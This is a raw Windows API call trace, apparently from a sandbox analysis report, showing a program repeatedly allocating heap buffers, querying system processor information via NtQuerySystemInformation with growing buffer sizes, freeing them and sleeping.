RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0275.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0275.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0275.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0275.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0275.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0275.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.690] Sleep (dwMilliseconds=0x110) [0275.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0275.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0275.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0275.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.709] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0275.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0275.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0275.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0275.710] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0275.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.710] Sleep (dwMilliseconds=0x110) [0275.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0275.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.716] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0275.716] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0275.716] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0275.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0275.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0275.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0275.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0275.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0275.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0275.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0275.718] Sleep (dwMilliseconds=0x110) [0275.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0275.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0275.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0275.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0275.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0275.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0275.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0276.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0276.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0276.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.006] Sleep (dwMilliseconds=0x110) [0276.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0276.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0276.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0276.036] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0276.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0276.036] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0276.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0276.037] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.037] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0276.037] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.037] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.037] Sleep (dwMilliseconds=0x110) [0276.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0276.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0276.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0276.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0276.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0276.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0276.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0276.084] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0276.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.085] Sleep (dwMilliseconds=0x110) [0276.105] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0276.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0276.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0276.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0276.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0276.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0276.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0276.116] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0276.120] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.120] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.120] Sleep (dwMilliseconds=0x110) [0276.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0276.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0276.183] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0276.183] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.183] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0276.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0276.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0276.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0276.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0276.211] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.212] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.212] Sleep (dwMilliseconds=0x110) [0276.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0276.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0276.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0276.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0276.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0276.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0276.257] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0276.257] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.258] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0276.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.271] Sleep (dwMilliseconds=0x110) [0276.278] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0276.278] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0276.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0276.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0276.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0276.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0276.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0276.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0276.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.285] Sleep (dwMilliseconds=0x110) [0276.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0276.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0276.305] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0276.305] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0276.305] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0276.305] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.306] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0276.306] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0276.306] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.307] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0276.307] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.308] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.308] Sleep (dwMilliseconds=0x110) [0276.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0276.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0276.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0276.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0276.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0276.350] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0276.350] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0276.350] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0276.351] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.352] Sleep (dwMilliseconds=0x110) [0276.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0276.397] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0276.398] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0276.398] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0276.398] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0276.398] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.399] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0276.399] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0276.399] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.403] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0276.403] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.404] Sleep (dwMilliseconds=0x110) [0276.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0276.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0276.492] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0276.492] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0276.496] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0276.496] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0276.497] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0276.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0276.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0276.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0276.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0276.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0276.499] Sleep (dwMilliseconds=0x110) [0276.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0276.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 